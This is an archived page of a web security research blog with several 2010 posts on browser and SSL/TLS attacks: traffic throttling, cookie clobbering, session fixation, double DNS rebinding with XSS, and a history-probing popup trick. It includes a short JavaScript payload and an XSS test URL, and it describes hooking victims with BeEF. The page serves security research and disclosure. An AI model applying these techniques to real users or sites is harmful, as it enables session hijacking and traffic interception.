Cenzic 232 Patent
Paid Advertising
web application security lab

Throttling Traffic Using CSS + Chunked Encoding

September 1st, 2010

19 posts left…

So Pyloris doesn’t work particularly well for port exhaustion on the server, but what if we can exhaust the connections on the client to better meter out traffic? That would make it easier for a MITM to see each individual request if it worked. So I started down a rather complicated path of using a mess load of link tags on an HTTP website trying to affect the connections on the HTTPS version of the same domain. No joy. It turns out that the limits placed on one port don’t affect what happens on another (at least in Firefox). So while I can exhaust all the connections to a domain over a single port I can’t do anything using HTTPS - or so it seemed (unless I was willing to muddy the water further by sending a bunch of requests that I knew are a certain size to the HTTPS site - which just seemed more painful than helpful).

Then, based on some earlier research I stormed into id’s office and I started bitching that there was no point in trying to stop port exhaustion if they were going to allow tons of connections, just over multiple sockets anyway. As the words came out of my mouth I realized I had come up with the answer - a ton of webservers. I guessed that there must be some upper bound of outbound connections and it’s probably at or less than 130. You should have seen id’s face as I asked him to set up 130 connections / 6 connections per socket = 22 web-servers for me. Hahah… I thought he’d kill me.

It turns out it’s nowhere near 130 open connections. Firefox sets a rather arbitrary 30 connection limit. So if you can create 5 open web-servers and exhaust 30 connections and only free up one long enough to allow the victim to download one request at a time, I think we’re in business. Makes sense in theory. The problem is that it’s REALLLLY slow. I mean… painful. In my testing it seemed more like the server was broken entirely from the victim’s perspective. But eventually… and in some cases I mean minutes later - it would load. I’m sure that the attack could be optimized to work based on the fact that no more packets are being sent when the image gets downloaded or whatever… which would signal the program to free up a connection. This is opposed to my crapola time based solution combined with chunked encoding to force the connection to stay open without downloading anything that I came up with for testing. So I bet this attack could work if someone put some tender loving care into it, but it was kind of a huge waste of time for me personally - and for poor id.

Incidentally, for those who have never seen or met id, and would like to know a little about the other side of webappsec that I don’t talk about much here (the configuration, operating system and network), you’re chance is nearing. There’s a rumor that he’ll be speaking at Lascon in October. He’ll be talking on how he’s managed to secure ha.ckers.org for all these years despite how much of a target I’ve made it. :) Should be fun.

Pyloris and Metering Traffic

September 1st, 2010

20 posts left…

Pyloris is a python version of Slowloris, and since it is written in python it’s SSL version is thread safe. So what better way to lock up an SSL/TLS Apache install (given that Apache still hasn’t fixed their DoS)? Well, one of the big problems attackers have when trying to decipher SSL/TLS traffic is the fact that browsers not only send a lot of request down a single connection but they also connect use a bunch of open connections over separate sockets. What if we could use pyloris to exhaust all but one open socket?

Well it turns out that while this sorta works, there are a lot of issues with the concept. Firstly, it requires Apache. Secondly the server can’t be using a load balancer (assuming the load balancer isn’t using Apache itself). Thirdly it requires that there are no other users on the system or there will be a seriously annoying user experience for the poor victim who can’t reach the site that the man in the middle is trying to decipher traffic from. Alas… So while this didn’t work particularly well in my testing, I’m certain with more thinking someone can figure out a way to do this.

XSHM Mark 2

September 1st, 2010

21 posts left…

If you’re familiar with XSHM this is going to look awfully similar (but better). When a script creates a new popup (or tab) it retains control over where to send it at a later date. I talked about this concept before. But let’s see what else can be done. What if the attacker uses the history.length function to calculate how many pages a user has visited after they left the tab for wherever they landed. The attacker could do something like this:

a.location = 'data:text/html;utf-8,<script>alert(history.length);history.go(-1);<\/script>';

By setting either a recursive setTimeout or using some manual polling mechanism, the attacker can (in this case) cause a popup which monitors how many pages they’ve gone. Normally it wouldn’t cause a popup, the attacker would redirect to another domain that they had access to which would do the same history.length check. Voila. The user only sees a brief white flash and then the same page they were just on - as if nothing happened. They’d probably just think their browser is messing up again. This could be helpful in a number of esoteric situations where the number of pages visited may change, or you may want to force them through several flows (and back and forth again) all with a single mouse click - giving you authority to popup in the first place. The best part is that this will follow them while they surf for as long as both windows stay open.

Cookie Clobbering

September 1st, 2010

22 posts left…

While thinking about the previous issue and listening to Jeremiah’s preso and talking with the guys at Microsoft I got to thinking about cookie clobbering. Let’s say that Microsoft thinks HTTP cookies overwriting secure cookies is a big enough problem to fix. Let’s walk through the use cases. Let’s say there is a separate place for secure cookies that can’t be overwritten by non-secure cookies. Does that mean two cookies are replayed in HTTPS space, or that the HTTPS cookie always wins? Okay… let’s say it wins and the secure flag cookie cookie is the only one sent. Well let’s not forget about Jer’s cookie clobbering script.

When an attacker forces overwriting of the cookie jar, they get the exact same effect. Now the victim has no cookies secure or otherwise if the global cookie jar stays the same size and it remains a LIFO system. So now you’re saying, well the attacker can just use a SSL/TLS enabled cookie clobbering scripts - you’re right! So now there has to be a per-site container… or something - and doesn’t that completely defeat the purpose of the upper limits on cookies anyway? Now DoS conditions become an issue with overwriting the disc with tons of huge cookies, and so on. Anyway… this probably needs a lot more thought, and I’m certainly not advocating “fixing” this, just to end up with a worse situation than we already have. But certainly secure cookies shouldn’t be clobbered by HTTP cookies - in my opinion.

MITM, SSL and Session Fixation

September 1st, 2010

23 posts left…

It’s been known for a long time that HTTP can set cookies that can be read in HTTPS space because cookies don’t follow the same origin policy in the way that JavaScript does. More importantly, HTTP cookies can overwrite HTTPS cookies, even if the cookies are marked as secure. I started thinking of a form of session fixation during our research that uses this to the attacker’s advantage. Let’s assume the attacker wants to get access to a user’s account that’s over SSL/TLS. Now let’s assume the website sets a session cookie prior to authentication and after authentication the site marks the cookie as valid for whatever username/password combo it receives.

First, the attacker goes to the website before the victim gets there so he can get a session cookie. Then, if the victim is still in HTTP for the same domain the attacker can set a cookie that will replay to the HTTPS website. So the attacker sets the same cookie that he just received into the victim’s browser. Once the victim authenticates, the cookie that the attacker gave the victim (and knows) is now valid for the victim’s account. Now if the victim was already authenticated or had already gotten a session token, no big deal. The attacker overwrites the cookie, which at worst logs the user out. Once the victim re-authenticates, voila - session fixation. Now all the attacker has to do is replay the same cookie in his own browser and he’s in the user’s account.

Issues with Perspectives

September 1st, 2010

24 posts left…

When I told one of my guys about the double DNS rebinding attack, he said, “Well it’s a good thing I use perspectives.” So that was my clue that I had better get familiar with the plugin if people are seriously relying on it for security. In the process we found a number of potential issues. For those of you who aren’t super clued in about this tool it was originally designed to handle situations where governments are tapping people using things like Packet Forensics where a valid certificate authority is being used to man in the middle someone or a group of individuals.

First of all it’s easy to detect perspectives for a man in the middle. Perspectives sends a lot of HTTP traffic, which the attacker can easily read and figure out is related to perspectives. That may not seem important, because if an attacker knows that a user has it installed what can they really do? We’ll come back to this.

Embedded content is not verified by perspectives, only the parent window. Because most websites (even HTTPS) use third party service providers, caching servers or whatever for static content, the attacker will simply MitM’s the “static” servers serving up CSS, JavaScript or objects that are dynamic content once rendered. By modifying the response and including active content, anything that can be seen by the DOM is still accessible to the man in the middle. Kinda defeats the purpose of perspectives…

Using the fact that an attacker knows that someone is using perspectives (which they can determine by forcing someone through an SSL/TLS link), the attacker can simply MITM only the embedded content. Of course there are changes a user can make to the settings and options to reduce this risk, but like all options, they’re probably not changed often and the defaults really aren’t good.

Lastly, I tried perspectives against the double DNS rebinding issue, and unfortunately instead of the huge pop-down that would actually alert someone to the problem, because the attack uses a valid cert from a nearby sub-domain that perspectives has probably seen before it only gives the small warning that most people probably wouldn’t notice unless they were really paying attention.

Prior Knowledge Of User’s Cert Warning Behavior

September 1st, 2010

25 posts left…

One of the issues Josh and I talked about at Blackhat was how the SSL certificate warning message can be used to gain information about a user’s behavior and how that can be used against the user. Let’s say a man in the middle causes an error via proxying a well-known owner/subsidiary. For example let’s say https://www.youtube.com/ which most technical people know belongs to Google and which, incidentally causes SSL/TLS mismatch errors because it’s mis-configured. Experts who see such an error and investigate will think it’s just a dumb (innocent) error. Non-experts will click through immediately, because they always do when they see such things.

By measuring the wait time the attacker can know which type of user the victim is - a technical one, or a novice. If the user is a novice the attacker knows they don’t have to worry anymore - they can deliver their snake oil cert later if the user goes through it “quickly” because that user’s behavior will most likely stay the same. Of course figuring out the timing might be a bit tricky because really new users will be awfully confused by cert warnings and will seem “slow” I’d bet. Anyway, something to investigate further.

IE Cookies

August 27th, 2010

26 posts left…

The fact that IE8 doesn’t delete cookies upon telling it to (at least in my testing) until browser shut-down isn’t just bad for usability (and ho boy is it annoying when you’re testing) but it has other interesting privacy implications. Generally I tell people not to set the same cookie more than once. That makes it harder to use old XMLHTTPRequest bugs to download the cookie (which may otherwise be protected using HTTPOnly). But what if the cookie weren’t sensitive, but rather used for tracking?

If a site sets a unique cookie and the user clears cookies in IE8, that doesn’t mean that IE8 doesn’t keep sending the cookie (it’s retained in memory) - which means the site still gets it. If the site is trying to track the user they can simply keep setting the exact same HTTP cookie with an “expires” in the future to make it persist after the browser closes and voila! Even though the user thinks they cleaned their cookies, not for a moment was the cookie removed in IE8. Could be useful for banner advertisers or companies that need to do large scale tracking of users.

MitM DNS Rebinding SSL/TLS Wildcards and XSS

August 22nd, 2010

27 posts left…

This was one of the more complex issues Josh Sokol and I talked about during our presentation at Blackhat. Let’s say there’s an SSL/TLS protected website (addons.mozilla.org) that an attacker knows that the victim is using. The attacker is a MitM but let’s say that addons.mozilla.org has no security flaws in it whatsoever. Let’s also say that there’s another subdomain called mxr.mozilla.org that has the following attributes: It has no important information on it (otherwise the attacker would be content with attacking it instead), it’s vulnerable to XSS, it doesn’t care about host headers and uses a wildcard cert for *.mozilla.org. How can an attacker use that to their advantage?

The victim requests the IP for addons.mozilla.org for which the attacker modifies the responding DNS TTL to 1 sec (and all subsequent DNS traffic to that domain). The victim logs into addons.mozilla.org (gets cookie). Doing login detection can help determine that the user is authenticated but it’s important that the attack doesn’t start before this, otherwise the attack will fail.

The attacker firewalls off the IP to addons.mozilla.org and forces user to the XSS URL at:
https://addons.mozilla.org/mozilla-central/ident?i=a%20onmouseover%3Dalert(’XSS’)%20a (notice that the hostname is wrong as it should be mxr.mozilla.org because that is where the XSS lives). Note that this WAS a real XSS in mxr, but has been fixed, and to make it work it would require the user to mouse over it, so you’d have to do some clickjacking or something, but let’s just pretend that all wasn’t a problem, and/or that there was an easier XSS.

The victim requests the IP for addons.mozilla.org again but this time the attacker responds to the DNS request (with 1 second TTL) with the IP address of mxr.mozilla.org (not addons). The user connects to the mxr.mozilla.org IP address sending the wrong host header - the reason this works is because the wildcard SSL/TLS cert allows for any domain and the mxr.mozilla.org website doesn’t care about host headers. The victim runs the XSS in context of addons.mozilla.org even though they’re on the mxr.mozilla.org IP. That sounds bad (maybe useful for phishing) but there’s worse the attacker can do.

The attacker can give up if addons.mozilla.org doesn’t use HTTPOnly cookies because the attacker can just steal the cookie from JavaScript space. But let’s assume that addons has no flaws in it, including how it sets cookies. In that case the attacker just rebinds again. For lack of a better term we called this “double DNS rebinding.”

The attacker firewalls off IP for mxr.mozilla.org and un-firewalls off the addons.mozilla.org IP. The victim’s browser re-binds and requests DNS for addons.mozilla.org again. The attacker delivers the IP for addons.mozilla.org. The victim’s cookie is sent to addons.mozilla.org and the JavaScript is now in context of addons.mozilla.org. The victim runs BeEf shell back to attacker, which allows the attacker to see the contents of the user’s account and interact as if they were the user.

We talked with a few people in various places about how likely this is, and although it worked on one of the two sites we checked we think the likelihood that it will work on SSL/TLS enabled sites is pretty low. It has to be wild card, has to have HTTP Response splitting/XSS, etc… and has to ignore the host header. We guesstimate that it’s probably between 2-4% of SSL/TLS protected sites that would be affected by this, although, in reality there’s not a lot of risk here because this has a lot of moving parts - there are certainly easier exploits out there. But the interesting part is this is yet another reason that all sub domains should be considered in scope when you’re talking about something sensitive sitting behind authentication beyond just breaking in and stealing the cert outright.

Incidentally when I told the Mozilla guys about this, they said, “Why would we have checked for XSS in mxr? There’s nothing important on there… It’s all public information.” followed by, “Well, it’ll be fun checking for XSS on all our sub domains now.” That’s a good idea anyway for phishing, but checking for host headers is an easier short-cut in the short term. I wouldn’t worry about this attack, because it’s unlikely, but it was interesting coming up with the use case.

Using Cookies For Selective DoS and State Detection

August 22nd, 2010

28 posts left….

This is a continuation of the first post where we described how you can use cookies to DoS certain portions of the website. After our speech one of the Mozilla guys came up to us and described another attack that arises from this. Let’s say when a user logs in it sets a cookie that is 200 bytes long, and when they log out it re-sets the same cookie to 50 bytes. Well if the attacker can set a cookie with a particular path to a single image on the site, for instance, they can use JavaScript to check with an onerror event handler to see if the image has loaded.

By combining the over-long cookie (minus 50 bytes) a logged in state will cause the image to fail to load, where as a logged out state will allow the image to load just fine. In this way an attacker can tell cookie states as long as the cookies are variable width and there aren’t other cookies muddying the waters. Interesting attack, I thought!